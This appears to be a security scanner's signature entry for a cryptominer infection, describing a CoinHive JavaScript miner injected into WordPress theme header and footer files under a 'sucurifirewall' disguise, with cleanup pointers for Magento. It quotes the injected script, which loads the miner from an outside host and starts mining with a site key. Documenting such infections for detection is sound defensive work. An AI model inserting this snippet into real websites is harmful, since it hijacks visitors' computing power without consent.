malware.cryptominer.5

Description:
Website contains an injected CoinHive JavaScript miner library, which pretends to be related to sucurifirewall.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt src="https://coinhive[.]com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.User('wMi7wDDFODxuLxV9S0M32EK0G9czsndP', 'sucurifirewall'); 
    miner.start();
</script>

More information.

Affecting: Magento

Mitigation How to clean a hacked Magento site

SiteCheck Signatures